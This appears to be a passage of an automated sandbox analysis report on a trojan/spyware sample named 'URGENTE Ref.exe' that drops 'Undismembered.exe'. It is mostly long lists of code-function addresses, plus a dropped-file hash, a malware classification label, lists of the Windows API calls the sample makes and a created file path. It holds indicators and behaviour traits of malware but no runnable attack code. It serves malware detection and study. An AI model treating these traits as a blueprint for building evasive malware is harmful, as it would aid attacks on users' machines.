          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226EA57010_2_226EA570
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E577010_2_226E5770
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E0D4810_2_226E0D48
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E274910_2_226E2749
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226EE54010_2_226EE540
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226EA55F10_2_226EA55F
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E275810_2_226E2758
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E532810_2_226E5328
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E772210_2_226E7722
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E772010_2_226E7720
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226EB32010_2_226EB320
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E230010_2_226E2300
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226EF30010_2_226EF300
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226ED30010_2_226ED300
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226ED31010_2_226ED310
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226EB31010_2_226EB310
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E15E810_2_226E15E8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226EE9E010_2_226EE9E0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226EC9E010_2_226EC9E0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E15F810_2_226E15F8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E2FF910_2_226E2FF9
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226EC9F010_2_226EC9F0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226EA9F010_2_226EA9F0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E97C010_2_226E97C0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E5BD810_2_226E5BD8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226EE9D010_2_226EE9D0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226ED7A010_2_226ED7A0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E11A010_2_226E11A0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E2BA010_2_226E2BA0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226EB7A010_2_226EB7A0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E8FA110_2_226E8FA1
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226EB7B010_2_226EB7B0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E2BB010_2_226E2BB0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E97B010_2_226E97B0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E578010_2_226E5780
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226EF78110_2_226EF781
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E119F10_2_226E119F
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226EF79010_2_226EF790
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226ED79110_2_226ED791
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E84B9810_2_22E84B98
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8447810_2_22E84478
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E83FE810_2_22E83FE8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8C7E810_2_22E8C7E8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E81FE810_2_22E81FE8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E89CE010_2_22E89CE0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8C7E010_2_22E8C7E0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8F2E010_2_22E8F2E0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E884E710_2_22E884E7
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E81FF810_2_22E81FF8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E884F810_2_22E884F8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8DAF810_2_22E8DAF8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E859F010_2_22E859F0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8F2F010_2_22E8F2F0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8AFF310_2_22E8AFF3
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E836C810_2_22E836C8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8B4C810_2_22E8B4C8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E816C810_2_22E816C8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E871C810_2_22E871C8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E889C010_2_22E889C0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E816D810_2_22E816D8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E871D810_2_22E871D8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E83FD810_2_22E83FD8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E859DF10_2_22E859DF
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8DFD010_2_22E8DFD0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E89CD310_2_22E89CD3
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E82DA810_2_22E82DA8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8A1A810_2_22E8A1A8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E85EA810_2_22E85EA8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E80DAB10_2_22E80DAB
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E876A010_2_22E876A0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8CCA010_2_22E8CCA0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8F7A710_2_22E8F7A7
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E80DB810_2_22E80DB8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E85EB810_2_22E85EB8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8F7B810_2_22E8F7B8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E836B910_2_22E836B9
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8DFBF10_2_22E8DFBF
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8CCB010_2_22E8CCB0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E889B110_2_22E889B1
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8B4B710_2_22E8B4B7
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8248810_2_22E82488
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E88E8810_2_22E88E88
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E84B8810_2_22E84B88
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8048910_2_22E80489
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8E48910_2_22E8E489
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8638010_2_22E86380
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8FC8010_2_22E8FC80
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8B98010_2_22E8B980
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8049810_2_22E80498
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8E49810_2_22E8E498
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8A19B10_2_22E8A19B
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8B99010_2_22E8B990
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8769110_2_22E87691
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E81B6810_2_22E81B68
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E87B6810_2_22E87B68
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8D16810_2_22E8D168
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8636F10_2_22E8636F
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8506010_2_22E85060
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8E96010_2_22E8E960
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8A66010_2_22E8A660
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8446710_2_22E84467
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8D17810_2_22E8D178
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E88E7810_2_22E88E78
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8A67010_2_22E8A670
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8247710_2_22E82477
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8124810_2_22E81248
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8684810_2_22E86848
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E83B4810_2_22E83B48
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8004010_2_22E80040
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8D64010_2_22E8D640
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8934010_2_22E89340
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8BE4710_2_22E8BE47
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E83B5810_2_22E83B58
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8BE5810_2_22E8BE58
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E81B5810_2_22E81B58
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8935010_2_22E89350
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8505010_2_22E85050
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8E95110_2_22E8E951
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E87B5710_2_22E87B57
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8092810_2_22E80928
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8552810_2_22E85528
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8EE2810_2_22E8EE28
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8AB2810_2_22E8AB28
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8322B10_2_22E8322B
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8D62F10_2_22E8D62F
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8C32010_2_22E8C320
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8802010_2_22E88020
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8323810_2_22E83238
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8AB3810_2_22E8AB38
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8683810_2_22E86838
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8803010_2_22E88030
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8123710_2_22E81237
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8DB0810_2_22E8DB08
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8290810_2_22E82908
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8B00010_2_22E8B000
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E86D0010_2_22E86D00
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8291810_2_22E82918
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8981810_2_22E89818
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8091810_2_22E80918
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8551910_2_22E85519
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E86D1010_2_22E86D10
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8981010_2_22E89810
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8C31010_2_22E8C310
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_22E8EE1710_2_22E8EE17
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235D57C010_2_235D57C0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235DF5A010_2_235DF5A0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235DBE1010_2_235DBE10
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235D162010_2_235D1620
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235D4B4010_2_235D4B40
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235D194010_2_235D1940
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235D356010_2_235D3560
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235D036010_2_235D0360
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235D450010_2_235D4500
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235D130010_2_235D1300
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235DD53810_2_235DD538
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235D2F2010_2_235D2F20
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235DF1CA10_2_235DF1CA
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235D25C010_2_235D25C0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235D41E010_2_235D41E0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235D0FE010_2_235D0FE0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235DE79810_2_235DE798
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235DF59010_2_235DF590
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235DE78E10_2_235DE78E
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235D1F8010_2_235D1F80
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235D518010_2_235D5180
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235DF1BD10_2_235DF1BD
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235DF1BF10_2_235DF1BF
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235D3BA010_2_235D3BA0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235D09A010_2_235D09A0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235D324010_2_235D3240
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235D004010_2_235D0040
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235D4E6010_2_235D4E60
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235D1C6010_2_235D1C60
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235D481010_2_235D4810
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235D2C0010_2_235D2C00
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235DF22810_2_235DF228
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235D482010_2_235D4820
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235D3EC010_2_235D3EC0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235D0CC010_2_235D0CC0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235D28E010_2_235D28E0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235D229010_2_235D2290
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235D928110_2_235D9281
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235D388010_2_235D3880
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235D068010_2_235D0680
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235D0CAF10_2_235D0CAF
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235D54A010_2_235D54A0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235D22A010_2_235D22A0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EE34810_2_235EE348
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235E050810_2_235E0508
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EE66810_2_235EE668
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235E6C8810_2_235E6C88
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235E7F4810_2_235E7F48
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EB14810_2_235EB148
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EE97810_2_235EE978
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235ECD6810_2_235ECD68
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235E9B6810_2_235E9B68
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EDD0810_2_235EDD08
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235E790810_2_235E7908
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EAB0810_2_235EAB08
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EF92810_2_235EF928
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EC72810_2_235EC728
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235E952810_2_235E9528
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EEFC810_2_235EEFC8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235E8BC810_2_235E8BC8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EBDC810_2_235EBDC8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EC3F910_2_235EC3F9
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235ED9E810_2_235ED9E8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235E75E810_2_235E75E8
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_235EA7E8
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_235ED397
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_235EE988
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_235EB788
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_235E8588
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_235ED3A8
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_235E6FA8
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_235EA1A8
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_235EFC48
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_235ECA48
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_235E9848
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_235E0040
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_235E8268
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_235EB468
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_235EF608
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_235EC408
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_235E9208
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_235E0006
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_235EFC37
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_235EE028
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_235E7C28
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_235EAE28
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_235ED6C8
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_235E72C8
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_235EA4C8
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_235E04F7
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_235EAAF7
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_235EF2E8
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_235EC0E8
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_235E8EE8
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_235E8898
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_235EEC98
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_235ED088
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_235E9E88
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_235EECA8
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_235E88A8
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_235EBAA8
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_23612300
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_23610040
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_23610760
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_23610E48
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_236137F2
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_23611530
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_23611C18
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_236122F1
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_23610022
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_23610750
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_23610E38
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_23611521
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_23611C08
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\nskD2BC.tmp\nsExec.dll 3E3D516D4F28948A474704D5DC9907DBE39E3B3F98E7299F536337278C59C5C9
Source: URGENTE Ref.exe, 00000000.00000000.1212619561.0000000000433000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameimmensest autoecic.exe6 vs URGENTE Ref.exe
Source: URGENTE Ref.exe | Binary or memory string: OriginalFilenameimmensest autoecic.exe6 vs URGENTE Ref.exe
Source: URGENTE Ref.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@6/21@7/6
Source: C:\Users\user\Desktop\URGENTE Ref.exe | Code function: 0_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\URGENTE Ref.exe | Code function: 0_2_00404486 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
Source: C:\Users\user\Desktop\URGENTE Ref.exe | Code function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar
Source: C:\Users\user\Desktop\URGENTE Ref.exe | File created: C:\Users\user\AppData\Roaming\fyldepenneblkkets
